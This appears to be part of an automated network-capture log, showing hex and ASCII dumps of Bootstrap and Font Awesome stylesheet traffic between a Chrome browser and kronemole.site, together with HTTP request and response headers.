                                                                          2023-11-21 16:58:40 UTC288INData Raw: 23 38 35 36 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 35 36 34 30 34 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 64 61 6e 67 65 72 7b 63 6f 6c 6f 72 3a 23 37 32 31 63 32 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 63 36 63 62 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 64 61 6e 67 65 72 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 61 63 74 69 6f 6e 3a 66 6f 63 75 73 2c 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 64 61 6e 67 65 72 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 61 63 74 69 6f 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 37 32 31 63 32 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 31 62 30 62 37 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 64
                                                                          Data Ascii: #856404;border-color:#856404}.list-group-item-danger{color:#721c24;background-color:#f5c6cb}.list-group-item-danger.list-group-item-action:focus,.list-group-item-danger.list-group-item-action:hover{color:#721c24;background-color:#f1b0b7}.list-group-item-d
                                                                          2023-11-21 16:58:40 UTC293INData Raw: 63 69 74 79 3a 2e 39 7d 2e 74 6f 6f 6c 74 69 70 20 2e 61 72 72 6f 77 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 2e 38 72 65 6d 3b 68 65 69 67 68 74 3a 2e 34 72 65 6d 7d 2e 74 6f 6f 6c 74 69 70 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 61 75 74 6f 5b 78 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 74 6f 70 5d 2c 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 74 6f 70 7b 70 61 64 64 69 6e 67 3a 2e 34 72 65 6d 20 30 7d 2e 62 73 2d 74 6f 6f 6c 74 69
                                                                          Data Ascii: city:.9}.tooltip .arrow{position:absolute;display:block;width:.8rem;height:.4rem}.tooltip .arrow::before{position:absolute;content:"";border-color:transparent;border-style:solid}.bs-tooltip-auto[x-placement^=top],.bs-tooltip-top{padding:.4rem 0}.bs-toolti
                                                                          2023-11-21 16:58:40 UTC296INData Raw: 38 30 30 30 0d 0a 65 6d 65 6e 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 3a 3a 61 66 74 65 72 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 61 75 74 6f 5b 78 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 3a 3a 61 66 74 65 72 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 2e 35 72 65 6d 20 2e 35 72 65 6d 20 2e 35 72 65 6d 20 30 7d 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 61 75 74 6f 5b 78 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 72 69 67 68 74 20 2e
                                                                          Data Ascii: 8000ement^=right] .arrow::after,.bs-popover-auto[x-placement^=right] .arrow::before,.bs-popover-right .arrow::after,.bs-popover-right .arrow::before{border-width:.5rem .5rem .5rem 0}.bs-popover-auto[x-placement^=right] .arrow::before,.bs-popover-right .
                                                                          2023-11-21 16:58:40 UTC300INData Raw: 70 72 65 76 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 6f 75 74 6c 69 6e 65 3a 30 3b 6f 70 61 63 69 74 79 3a 2e 39 7d 2e 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2d 70 72 65 76 7b 6c 65 66 74 3a 30 7d 2e 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2d 6e 65 78 74 7b 72 69 67 68 74 3a 30 7d 2e 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2d 6e 65 78 74 2d 69 63 6f 6e 2c 2e 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2d 70 72 65 76 2d 69 63 6f 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 32 30 70 78 3b 68 65 69 67 68 74 3a 32 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 20 6e 6f 2d 72 65 70 65
                                                                          Data Ascii: prev:hover{color:#fff;text-decoration:none;outline:0;opacity:.9}.carousel-control-prev{left:0}.carousel-control-next{right:0}.carousel-control-next-icon,.carousel-control-prev-icon{display:inline-block;width:20px;height:20px;background:transparent no-repe
                                                                          2023-11-21 16:58:40 UTC304INData Raw: 74 7d 2e 72 6f 75 6e 64 65 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 6f 75 6e 64 65 64 2d 74 6f 70 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 6f 75 6e 64 65 64 2d 72 69 67 68 74 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 6f 75 6e 64 65 64 2d 62 6f 74 74 6f 6d 7b 62 6f 72
                                                                          Data Ascii: t}.rounded{border-radius:.25rem!important}.rounded-top{border-top-left-radius:.25rem!important;border-top-right-radius:.25rem!important}.rounded-right{border-top-right-radius:.25rem!important;border-bottom-right-radius:.25rem!important}.rounded-bottom{bor
                                                                          2023-11-21 16:58:40 UTC308INData Raw: 2d 74 6f 70 3a 31 30 30 25 7d 2e 66 6c 65 78 2d 72 6f 77 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 6c 65 78 2d 63 6f 6c 75 6d 6e 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 76 65 72 74 69 63 61 6c 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 6d 73 2d
                                                                          Data Ascii: -top:100%}.flex-row{-webkit-box-orient:horizontal!important;-webkit-box-direction:normal!important;-ms-flex-direction:row!important;flex-direction:row!important}.flex-column{-webkit-box-orient:vertical!important;-webkit-box-direction:normal!important;-ms-
                                                                          2023-11-21 16:58:40 UTC312INData Raw: 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 73 6d 2d 63 65 6e 74 65 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 21 69 6d 70 6f 72 74 61 6e 74 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 73 6d 2d 62 65 74 77 65 65 6e 7b 2d 77 65 62 6b 69 74 2d 62 6f
                                                                          Data Ascii: ebkit-box-pack:end!important;-ms-flex-pack:end!important;justify-content:flex-end!important}.justify-content-sm-center{-webkit-box-pack:center!important;-ms-flex-pack:center!important;justify-content:center!important}.justify-content-sm-between{-webkit-bo
                                                                          2023-11-21 16:58:40 UTC316INData Raw: 6e 74 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 73 74 72 65 74 63 68 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 72 65 74 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 2d 6d 64 2d 73 74 61 72 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6c 69 6e 65 2d 70 61 63 6b 3a 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 2d 6d 64 2d 65 6e 64 7b 2d 6d 73 2d 66 6c 65 78 2d 6c 69 6e 65 2d 70 61 63 6b 3a 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d
                                                                          Data Ascii: nt;-ms-flex-align:stretch!important;align-items:stretch!important}.align-content-md-start{-ms-flex-line-pack:start!important;align-content:flex-start!important}.align-content-md-end{-ms-flex-line-pack:end!important;align-content:flex-end!important}.align-
                                                                          2023-11-21 16:58:40 UTC424INData Raw: 66 2d 6c 67 2d 62 61 73 65 6c 69 6e 65 7b 2d 6d 73 2d 66 6c 65 78 2d 69 74 65 6d 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 73 65 6c 66 3a 62 61 73 65 6c 69 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 73 65 6c 66 2d 6c 67 2d 73 74 72 65 74 63 68 7b 2d 6d 73 2d 66 6c 65 78 2d 69 74 65 6d 2d 61 6c 69 67 6e 3a 73 74 72 65 74 63 68 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 73 65 6c 66 3a 73 74 72 65 74 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 66 6c 65 78 2d 78 6c 2d 72 6f 77 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 77
                                                                          Data Ascii: f-lg-baseline{-ms-flex-item-align:baseline!important;align-self:baseline!important}.align-self-lg-stretch{-ms-flex-item-align:stretch!important;align-self:stretch!important}}@media (min-width:1200px){.flex-xl-row{-webkit-box-orient:horizontal!important;-w
                                                                          2023-11-21 16:58:40 UTC428INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 6f 73 69 74 69 6f 6e 2d 73 74 69 63 6b 79 7b 70 6f 73 69 74 69 6f 6e 3a 2d 77 65 62 6b 69 74 2d 73 74 69 63 6b 79 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 73 74 69 63 6b 79 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 69 78 65 64 2d 74 6f 70 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 6c 65 66 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 31 30 33 30 7d 2e 66 69 78 65 64 2d 62 6f 74 74 6f 6d 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 31 30 33 30 7d 40 73 75 70 70 6f 72 74 73 20 28 28 70 6f 73 69 74 69 6f 6e 3a 2d 77 65 62 6b 69 74 2d 73 74 69 63 6b 79 29 20 6f 72 20 28
                                                                          Data Ascii: !important}.position-sticky{position:-webkit-sticky!important;position:sticky!important}.fixed-top{position:fixed;top:0;right:0;left:0;z-index:1030}.fixed-bottom{position:fixed;right:0;bottom:0;left:0;z-index:1030}@supports ((position:-webkit-sticky) or (
                                                                          2023-11-21 16:58:40 UTC459INData Raw: 33 39 37 65 0d 0a 35 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 6c 2d 35 2c 2e 70 78 2d 35 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 2d 61 75 74 6f 7b 6d 61 72 67 69 6e 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 61 75 74 6f 2c 2e 6d 79 2d 61 75 74 6f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 72 2d 61 75 74 6f 2c 2e 6d 78 2d 61 75 74 6f 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 62 2d 61 75 74 6f 2c 2e 6d 79 2d 61 75 74 6f 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 6c 2d 61 75 74 6f 2c 2e
                                                                          Data Ascii: 397e5{padding-bottom:3rem!important}.pl-5,.px-5{padding-left:3rem!important}.m-auto{margin:auto!important}.mt-auto,.my-auto{margin-top:auto!important}.mr-auto,.mx-auto{margin-right:auto!important}.mb-auto,.my-auto{margin-bottom:auto!important}.ml-auto,.
                                                                          2023-11-21 16:58:40 UTC463INData Raw: 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 2d 6d 64 2d 35 7b 6d 61 72 67 69 6e 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6d 64 2d 35 2c 2e 6d 79 2d 6d 64 2d 35 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 72 2d 6d 64 2d 35 2c 2e 6d 78 2d 6d 64 2d 35 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 62 2d 6d 64 2d 35 2c 2e 6d 79 2d 6d 64 2d 35 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 6c 2d 6d 64 2d 35 2c 2e 6d 78 2d 6d 64 2d 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 2d 6d 64 2d 30 7b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d
                                                                          Data Ascii: 5rem!important}.m-md-5{margin:3rem!important}.mt-md-5,.my-md-5{margin-top:3rem!important}.mr-md-5,.mx-md-5{margin-right:3rem!important}.mb-md-5,.my-md-5{margin-bottom:3rem!important}.ml-md-5,.mx-md-5{margin-left:3rem!important}.p-md-0{padding:0!important}
                                                                          2023-11-21 16:58:40 UTC468INData Raw: 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 72 2d 6c 67 2d 35 2c 2e 70 78 2d 6c 67 2d 35 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 6c 67 2d 35 2c 2e 70 79 2d 6c 67 2d 35 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 6c 2d 6c 67 2d 35 2c 2e 70 78 2d 6c 67 2d 35 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 2d 6c 67 2d 61 75 74 6f 7b 6d 61 72 67 69 6e 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6c 67 2d 61 75 74 6f 2c 2e 6d 79 2d 6c 67 2d 61 75 74 6f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 72
                                                                          Data Ascii: {padding-top:3rem!important}.pr-lg-5,.px-lg-5{padding-right:3rem!important}.pb-lg-5,.py-lg-5{padding-bottom:3rem!important}.pl-lg-5,.px-lg-5{padding-left:3rem!important}.m-lg-auto{margin:auto!important}.mt-lg-auto,.my-lg-auto{margin-top:auto!important}.mr
                                                                          2023-11-21 16:58:40 UTC472INData Raw: 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 74 65 78 74 2d 63 61 70 69 74 61 6c 69 7a 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 63 61 70 69 74 61 6c 69 7a 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 6f 6e 74 2d 77 65 69 67 68 74 2d 6c 69 67 68 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 6f 6e 74 2d 77 65 69 67 68 74 2d 6e 6f 72 6d 61 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 6f 6e 74 2d 77 65 69 67 68 74 2d 62 6f 6c 64 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 6f 6e 74 2d 69 74 61 6c 69 63 7b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 21 69 6d 70 6f 72 74 61 6e 74 7d
                                                                          Data Ascii: sform:uppercase!important}.text-capitalize{text-transform:capitalize!important}.font-weight-light{font-weight:300!important}.font-weight-normal{font-weight:400!important}.font-weight-bold{font-weight:700!important}.font-italic{font-style:italic!important}
                                                                          2023-11-21 16:58:40 UTC474INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.449751104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:40 UTC77OUTGET /assets/vendors/fontawesome/css/all.css HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: text/css,*/*;q=0.1
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: style
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:40 UTC138INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:40 GMT
                                                                          Content-Type: text/css
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:43:43 GMT
                                                                          last-modified: Mon, 19 Jul 2021 19:00:02 GMT
                                                                          vary: Accept-Encoding,User-Agent,User-Agent
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          CF-Cache-Status: HIT
                                                                          Age: 897
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0ODHeEY6pwXkPORkb6UrZ%2BzrubxzSYQ1pTvcT%2BHdeNPAVGxXRt9HscqZ2x483MIGPbHAtuyaSV9NJ0WQ7m%2FHYa08gni0mrMiMJANWGebjyN1c2KHbLJeBxw6YB48YKC8dQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a921f922016-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:40 UTC139INData Raw: 37 63 36 66 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 35 2e 31 35 2e 32 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 0a 2e 66 61 2c 0a 2e 66 61 73 2c 0a 2e 66 61 72 2c 0a 2e 66 61 6c 2c 0a 2e 66 61 64 2c 0a 2e 66 61 62 20 7b 0a 20 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20
                                                                          Data Ascii: 7c6f/*! * Font Awesome Free 5.15.2 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) */.fa,.fas,.far,.fal,.fad,.fab { -moz-osx-font-smoothing:
                                                                          2023-11-21 16:58:40 UTC140INData Raw: 0a 0a 2e 66 61 2d 73 6d 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 38 37 35 65 6d 3b 20 7d 0a 0a 2e 66 61 2d 31 78 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 20 7d 0a 0a 2e 66 61 2d 32 78 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 20 7d 0a 0a 2e 66 61 2d 33 78 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 65 6d 3b 20 7d 0a 0a 2e 66 61 2d 34 78 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 65 6d 3b 20 7d 0a 0a 2e 66 61 2d 35 78 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 65 6d 3b 20 7d 0a 0a 2e 66 61 2d 36 78 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 65 6d 3b 20 7d 0a 0a 2e 66 61 2d 37 78 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 65 6d 3b 20 7d 0a 0a 2e 66 61 2d 38 78 20 7b 0a 20
                                                                          Data Ascii: .fa-sm { font-size: .875em; }.fa-1x { font-size: 1em; }.fa-2x { font-size: 2em; }.fa-3x { font-size: 3em; }.fa-4x { font-size: 4em; }.fa-5x { font-size: 5em; }.fa-6x { font-size: 6em; }.fa-7x { font-size: 7em; }.fa-8x {
                                                                          2023-11-21 16:58:40 UTC141INData Raw: 20 31 30 30 25 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 70 69 6e 20 7b 0a 20 20 30 25 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: 100% { -webkit-transform: rotate(360deg); transform: rotate(360deg); } }@keyframes fa-spin { 0% { -webkit-transform: rotate(0deg); transform: rotate(0deg); } 100% { -webkit-transform: rotate(360deg);
                                                                          2023-11-21 16:58:40 UTC142INData Raw: 74 61 74 65 2d 39 30 2c 0a 3a 72 6f 6f 74 20 2e 66 61 2d 72 6f 74 61 74 65 2d 31 38 30 2c 0a 3a 72 6f 6f 74 20 2e 66 61 2d 72 6f 74 61 74 65 2d 32 37 30 2c 0a 3a 72 6f 6f 74 20 2e 66 61 2d 66 6c 69 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2c 0a 3a 72 6f 6f 74 20 2e 66 61 2d 66 6c 69 70 2d 76 65 72 74 69 63 61 6c 2c 0a 3a 72 6f 6f 74 20 2e 66 61 2d 66 6c 69 70 2d 62 6f 74 68 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 66 69 6c 74 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 66 69 6c 74 65 72 3a 20 6e 6f 6e 65 3b 20 7d 0a 0a 2e 66 61 2d 73 74 61 63 6b 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 70 6f 